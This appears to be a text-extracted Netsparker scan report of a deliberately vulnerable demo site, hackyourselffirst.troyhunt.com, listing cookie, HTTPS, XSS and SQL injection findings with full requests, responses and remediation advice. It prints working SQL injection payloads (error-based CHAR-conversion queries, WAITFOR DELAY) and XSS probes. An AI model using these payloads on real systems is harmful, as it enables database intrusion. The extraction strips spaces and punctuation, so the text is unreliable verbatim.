Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
